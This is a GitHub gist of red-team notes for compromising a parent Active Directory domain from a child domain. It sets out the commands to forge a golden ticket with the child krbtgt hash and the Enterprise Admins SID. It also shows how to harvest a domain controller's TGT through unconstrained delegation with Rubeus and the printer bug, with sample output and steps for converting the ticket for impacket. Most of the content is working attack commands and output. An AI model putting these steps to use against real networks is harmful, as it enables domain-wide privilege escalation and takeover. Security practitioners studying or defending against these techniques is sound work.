Last active
April 29, 2022 22:16
-
-
Save n00py/ffe0609012d594f86b4c793e46d6cd31 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Golden Tickets to hop domains: | |
| Requirements: | |
| Get krbtgt hash from child domain (secretsdump) | |
| Get SID of domain and SID of Enterprise admins group in parent domain (ldapdomaindump/bloodhound) | |
| ticketer.py -nthash | |
| [KRBTGT NT HASH FOR CHILD.PARENT.LOCAL] -domain-sid [SID FOR CHILD.PARENT.LOCAL] | |
| -domain CHILD.PARENT.LOCAL -extra-sid [SID OF ENTERPRISE ADMINS IN PARENT.LOCAL] | |
| [USERNAME IN CHILD.PARENT.LOCAL] | |
| cp [USERNAME].ccache /tmp/krb5cc_0 | |
| Then use impacket with -k | |
| Getting tickets from unconstrained delegation: | |
| Requirements: | |
| Shell a system with unconstrained delegation (typcially DC) | |
| Run Rubeus to wait for tickets: | |
| > execute-assembly Rubeus.exe monitor /interval:1 | |
| [*] Tasked beacon to run .NET program: Rubeus.exe monitor /interval:1 | |
| Use "Printer bug" to force authentication: | |
| For python, you can use dementor.py | |
| dementor.py DC01.CHILD.PARENT.LOCAL DC01.PARENT.LOCAL -u [ANY CHILD DOMAIN USER] -p [PASSWORD] | |
| [*]bound to spoolss | |
| [*] getting context handle... | |
| [*] sending RFFPCNEX... | |
| [-] exception DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied | |
| [*] done! | |
| Back on Rubeus: | |
| [*] Found new TGT: | |
| User : DCO1$@PARENT.LOCAL | |
| Base64EncodedTicket: | |
| doIFSzCCBUegAwIBBaEDAgEWooIERj<SNIP> | |
| Convert base64 to bytes: | |
| >python3 | |
| >> data = 'doIFSzCCBUegAwIBBaEDAgEWooIERj<SNIP>' | |
| >> fileData = base64.urlsafe_b64decode(data.encode('UTF-8')) | |
| • >> with open('ticket.kirbi','wb') as myfile: | |
| ... myfile.write(fileData) | |
| Convert from Kirbi (Rubeus) to ccache (impacket): | |
| ticket_converter.py ../ticket.kirbi ../ticket.ccache | |
| cp ticket.ccache /tmp/krb5cc_0 | |
| Use impacket with -k | |
| Tools: | |
| https://github.com/SecureAuthCorp/impacket | |
| https://github.com/GhostPack/Rubeus | |
| https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py | |
| Alternative tools: | |
| Rubeus -> Mimikatz | |
| dementor.py -> printerbug.py / SpoolSample | |
| https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py | |
| https://github.com/leechristensen/SpoolSample/ | |
| If you don't want to shell a server its possible, but more work: | |
| http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html | |
| https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment